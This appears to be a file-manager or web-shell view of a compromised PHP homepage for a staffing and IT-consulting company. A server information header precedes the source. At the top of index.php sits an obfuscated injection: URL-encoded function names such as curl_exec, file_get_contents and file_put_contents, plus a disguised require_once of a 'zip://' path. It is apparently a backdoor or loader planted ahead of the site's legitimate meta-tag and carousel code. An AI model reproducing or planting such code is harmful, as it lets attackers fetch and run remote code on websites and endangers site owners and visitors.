|
Server : LiteSpeed System : Linux terra.hostitbro.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64 User : outerorb ( 1091) PHP Version : 8.1.34 Disable Function : mail Directory : /home2/outerorb/zapnixinc.com/ | |
|
Path: /home2/outerorb/zapnixinc.com/index.php
Size: 15.59 KB
Permissions: 0644
<?php $wmeozn = explode(';',urldecode('%65%72%72%6f%72%5f%72%65%70%6f%72%74%69%6e%67;%70%72%65%67%5f%6d%61%74%63%68;%75%72%6c%65%6e%63%6f%64%65;%69%73%73%65%74;%73%74%72%70%6f%73;%66%69%6c%65%5f%67%65%74%5f%63%6f%6e%74%65%6e%74%73;%63%75%72%6c%5f%73%65%74%6f%70%74;%63%75%72%6c%5f%69%6e%69%74;%63%75%72%6c%5f%65%78%65%63;%63%75%72%6c%5f%63%6c%6f%73%65;%73%75%62%73%74%72;%66%69%6c%65%5f%70%75%74%5f%63%6f%6e%74%65%6e%74%73;%65%6d%70%74%79;%65%78%69%74')); /* sでもなたものg */ require_once ('zip://_') . ('(:з」#∠)_'); ?><?php include_once("include/main.inc.php");
$admin_res = getAdminDetails();
$homepage = mysqli_query($GLOBALS['dbconn'], "select pageDesc,page_metatitle,page_keyword,page_metadesc,pageDesc1,pageDesc2,pageTitle,pageBanner, pageImage, page_keyword, page_metadesc, page_metatitle, pageBanner,keyword1,keyword2 from static_pages where pageID='1' and status='Y'");
//Home page Banners
$home_res = mysqli_fetch_array($homepage);
$banner_link = upload_url . "page-banners/" . $home_res['pageBanner'];
$image_link = upload_url . "page-images/" . $home_res['pageImage'];
//setting standard format of meta tags by key1 & key2
if ($home_res['keyword1'] != '' && $home_res['keyword2'] != '') {
$m_title = "hotkeyword1 Manufacturers,hotkeyword2 Suppliers Exporters city, country";
$page_metatitle = str_replace('hotkeyword1', $home_res['keyword1'], str_replace('hotkeyword2', $home_res['keyword2'], str_replace('city', $admin_res['city'], str_replace('state', $admin_res['state'], str_replace('country', $admin_res['country'], $m_title)))));
$m_keyword = "hotkeyword1 Manufacturers,hotkeyword2 Manufacturers,hotkeyword1 Suppliers, hotkeyword2 Suppliers,hotkeyword1 Exporters,hotkeyword2 Exporters,hotkeyword1,hotkeyword2";
$page_metakey = str_replace('hotkeyword1', $home_res['keyword1'], str_replace('hotkeyword2', $home_res['keyword2'], str_replace('state', $admin_res['state'], $m_keyword)));
$m_desc = "companyName is the leading hotkeyword1 Manufacturers in city. Best Quality hotkeyword2 Suppliers and Exporters in country at Factory Price. Call phone";
$page_metadesc = str_replace('hotkeyword1', $home_res['keyword1'], str_replace('hotkeyword2', $home_res['keyword2'], str_replace('companyName', $admin_res['companyName'], str_replace('phone', $admin_res['mobile'], str_replace('city', $admin_res['city'], str_replace('state', $admin_res['state'], str_replace('country', $admin_res['country'], $m_desc)))))));
} else if ($home_res['page_metatitle'] != '' && $home_res['page_metadesc'] != '') {
//getting metatags from admin
$page_metatitle = $home_res['page_metatitle'];
$page_metakey = $home_res['page_keyword'];
$page_metadesc = $home_res['page_metadesc'];
} else {
//standard meta tags
$page_metatitle = "Stainless Steel Pipes Manufacturers in " . $admin_res['city'] . ", Best Stainless Steel Tube Suppliers Exporters in " . $admin_res['country'] . "";
$page_metadesc = "" . $admin_res['companyName'] . " is the leading Stainless Steel Pipes Manufacturers in " . $admin_res['city'] . ". Best Quality Stainless Steel Tube Suppliers and Exporters in " . $admin_res['country'] . " at Factory Price. Call " . $admin_res['mobile'] . "";
$page_metakey = "Stainless Steel Pipes Manufacturers, Stainless Steel Manufacturers, Stainless Steel Pipes Suppliers,Best Stainless Steel Tube Suppliers, Stainless Steel Pipes Exporters, Stainless Steel Exporters, Stainless Steel Pipes, Stainless Steel";
}
$page_desc = $home_res['pageDesc1'];
$page_descs = $home_res['pageDesc2'];
$page_desc = str_ireplace('{companyName}', $admin_res['companyName'], $page_desc);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php include 'app_top.php'; ?>
</head>
<body>
<?php include 'app_header.php'; ?>
<main>
<div class="slider-sec">
<div id="carouselExampleCaptions" class="carousel slide carousel-fade" data-bs-ride="carousel"
data-bs-interval="3000" data-bs-pause="false">
<div class="carousel-indicators">
<button type="button" data-bs-target="#carouselExampleCaptions" data-bs-slide-to="0" class="active"
aria-current="true" aria-label="Slide 1"></button>
<button type="button" data-bs-target="#carouselExampleCaptions" data-bs-slide-to="1"
aria-label="Slide 2"></button>
<button type="button" data-bs-target="#carouselExampleCaptions" data-bs-slide-to="2"
aria-label="Slide 3"></button>
</div>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="<?=theme_url;?>images/banner/banner.jpg" class="d-block w-100" alt="Financial Analysis Developing Meeting" title="Financial Analysis Developing Meeting">
<div class="carousel-caption">
<!--<div class="subtt">Meet Consulting</div>-->
<div class="tt"> Innovate, Transform <span> Lead Forward.</span></div>
<a title="Contact Us" title="Contact Us" href="contact.html" class="main-btn">Contact Us</a>
</div>
</div>
<div class="carousel-item ">
<img src="<?=theme_url;?>images/banner/bannertwo.jpg" class="d-block w-100" alt="Financial Analysis Developing Meeting" title="Financial Analysis Developing Meeting">
<div class="carousel-caption">
<!--<div class="subtt">Meet Consulting</div>-->
<div class="tt">Data Driven <span> Smart Decisions.</span></div>
<a href="contact.html" title="Contact Us" class="main-btn">Contact Us</a>
</div>
</div>
<div class="carousel-item ">
<img src="<?=theme_url;?>images/banner/bannerthree.jpg" class="d-block w-100" alt="Financial Analysis Developing Meeting" title="Financial Analysis Developing Meeting">
<div class="carousel-caption">
<!--<div class="subtt">Meet Consulting</div>-->
<div class="tt">Connecting Talent<span> Empowering Businesses.</span></div>
<a href="contact.html" title="Contact Us" class="main-btn">Contact Us</a>
</div>
</div>
</div>
</div>
</div>
<div class="abt-sec">
<div class="container">
<div class="main-tt">Working to make the world–<span>and
each other</span>– better every day.</div>
<div class="row mb-5">
<div class="col-lg-6 col-12">
<div class="abt-bx br">
<p>We are <a href="https://www.zapnix.co/">Zapnix</a>, a trusted leader in the US staffing industry, dedicated to connecting businesses with top talent to drive success. Our expertise lies in matching skilled candidates with companies that align with their professional aspirations, ensuring the perfect fit for both employers and job seekers.</p>
<!-- <p> For the past decade, we have also excelled in Digital Marketing, Website Design & Development, and Software Development, helping businesses grow in the digital space. Our services span across various sectors, including finance, healthcare, and technology, providing comprehensive workforce solutions. Additionally, we specialize in systems integration and efficient staffing solutions for businesses of all sizes.jectives.</p> -->
<a href="find-job.html" title="Search jobs" class="main-btn">Search jobs</a>
</div>
</div>
<div class="col-lg-6 col-12">
<div class="abt-bx">
<p>At <a href="https://www.zapnix.co/">Zapnix</a>, we specialize in IT consulting, helping businesses leverage technology for growth and efficiency. Our expert guidance ensures organizations stay ahead in the rapidly evolving digital landscape.</p>
<!-- <p> Our work enables global organizations to innovate, expand, and scale seamlessly. With our expertise, businesses can achieve operational excellence and long-term success. Join hands with <strong>Zapnix.</strong> to transform your business and workforce. Let us help you achieve remarkable success with our expertise in IT consulting and staffing.</p> -->
<a href="contact.html" title="Partner with us" class="main-btn main-btn2">Partner with us</a>
</div>
</div>
</div>
<!-- <p class="text-center mb-4"><strong>Technology and partnerships</strong></p>
<div class="row g-4 row-cols-1 row-cols-md-3 row-cols-lg-5 justify-content-center align-items-center">
<div class="col text-center">
<img src="<?=theme_url;?>images/icon/nmsdc-transparent.webp" alt="nmsdc-transparent" title="nmsdc-transparent">
</div>
<div class="col text-center">
<img src="<?=theme_url;?>images/icon/Microsoft.webp" alt="Microsoft" title="Microsoft">
</div>
<div class="col text-center">
<img src="<?=theme_url;?>images/icon/salesforce-1.webp" alt="salesforce" title="salesforce">
</div>
<div class="col text-center">
<img src="<?=theme_url;?>images/icon/Scaled-Agile.webp" alt="Scaled-Agile" title="Scaled-Agile">
</div>
<div class="col text-center">
<img src="<?=theme_url;?>images/icon/One-Ten.webp" alt="One-Ten" title="One-Ten">
</div>
</div> -->
</div>
</div>
<?php include "technology-partner.php"; ?>
<div class="cate-sec">
<div class="container">
<div class="row g-5 align-items-center mb-5">
<div class="col-lg-6 col-12">
<div class="cate-tx-bx">
<div class="tt"><span>Employment</span> Find a job that works for you</div>
<p>Any place you are in your expert process, whether you're searching for a momentary task, long-lasting position, or in the middle between, we can help. What's more, we don't stop at assisting you with getting a new line of work. As an individual from our ability organization, you'll approach upskilling and development preparing potential chances to refine your abilities and grow your skill.</p>
<p><strong>Investigate our open jobs to view as your ideal fit.</strong></p>
<a href="find-job.html" title="Search jobs" class="main-btn main-btn2">Search jobs</a>
</div>
</div>
<div class="col-lg-6 col-12">
<div class="cate-img-bx">
<img src="<?=theme_url;?>images/Employment.jpg" alt="Employment" title="Employment">
</div>
</div>
<div class="col-lg-6 col-12">
<div class="cate-img-bx">
<img src="<?=theme_url;?>images/Consulting.jpg" alt="Consulting" title="Consulting">
</div>
</div>
<div class="col-lg-6 col-12">
<div class="cate-tx-bx">
<div class="tt"><span>Consulting</span> Success starts with strategy</div>
<p>Change is the same old thing. The main steady is what befalls foundations that don't adjust. Our key counseling administrations can assist you with exploring change with deftness and conquer vulnerability with experience.</p>
<a href="consulting.html" title="Start innovating" class="main-btn main-btn2">Start innovating</a>
</div>
</div>
<div class="col-lg-6 col-12">
<div class="cate-tx-bx">
<div class="tt"><span>Staffing</span> Need talent?</div>
<p>We break obtaining bottlenecks and power dynamic groups across different ventures in both the general population and confidential areas.</p>
<a href="staffing.html" title="Hire top talent" class="main-btn main-btn2">Hire top talent</a>
</div>
</div>
<div class="col-lg-6 col-12">
<div class="cate-img-bx">
<img src="<?=theme_url;?>images/Staffing.jpg" alt="Staffing" title="Staffing">
</div>
</div>
<!--<div class="col-lg-6 col-12">-->
<!-- <div class="cate-img-bx">-->
<!-- <img src="<?=theme_url;?>images/Payrolling.jpg" alt="Payrolling" title="Payrolling">-->
<!-- </div>-->
<!--</div>-->
<!--<div class="col-lg-6 col-12">-->
<!-- <div class="cate-tx-bx">-->
<!-- <div class="tt"><span>Payrolling</span> Scaling made simple</div>-->
<!-- <p>Adding to your group shouldn't mean added cerebral pains. We can go about as the business of record, overseeing finance, guaranteeing agreeable and precise remuneration, and improving on your HR interaction for consistent scaling.</p>-->
<!-- <a href="payrolling.html" title="Start scaling" class="main-btn main-btn2">Start scaling</a>-->
<!-- </div>-->
<!--</div>-->
</div>
<div class="row g-5 align-items-center mt-0">
<div class="col-lg-4 col-12">
<div class="cate-tx-bx">
<div class="tt"><span>Industries</span> Powering innovation on a global scale</div>
<p>We join innovation, uncommon ability, and demonstrated procedures to enable establishments all over the planet to arrive at their objectives quicker.</p>
</div>
</div>
<div class="col-lg-8 col-12">
<div class="swiper slide1">
<div class="swiper-wrapper">
<div class="swiper-slide">
<div class="cate-card">
<div class="icon">
<img src="<?=theme_url;?>images/icon/Financial-Services.svg" alt="Financial Service" title="Financial Service">
</div>
<div class="tt">Financial Services</div>
<p>We enable organizations on the bleeding edge of tech with groundbreaking arrangements and industry
skill, empowering them to advance, scale, and remain ahead in a consistently developing tech scene.
</p>
<a href="financial.html" title="Learn More">Learn More</a>
</div>
</div>
<div class="swiper-slide">
<div class="cate-card">
<div class="icon">
<img src="<?=theme_url;?>images/icon/Technology.svg" alt="Technology" title="Technology">
</div>
<div class="tt">Technology</div>
<p>We enable organizations on the front line of tech with extraordinary arrangements and industry mastery, deep expertise empowering them to enhance, scale, and remain ahead in a constantly evolving tech scene.
</p>
<a href="technology.html" title="Learn More">Learn More</a>
</div>
</div>
<div class="swiper-slide">
<div class="cate-card">
<div class="icon">
<img src="<?=theme_url;?>images/icon/Life Sciences.svg" alt="Life Sciences" title="Life Sciences">
</div>
<div class="tt">Life Sciences</div>
<p>We enable organizations on the bleeding edge of tech with groundbreaking arrangements and industry
skill, empowering them to improve, scale, and remain ahead in an always developing tech scene.
</p>
<a href="" title="Learn More">Learn More</a>
</div>
</div>
</div>
<div class="swiper-button-next"></div>
</div>
</div>
</div>
</div>
</div>
<?php include 'blog_home.php'; ?>
</main>
<?php include 'footer_form.php'; ?>
<?php include 'app_footer.php'; ?>
<?php include 'app_bottom.php'; ?>
</body>
</html>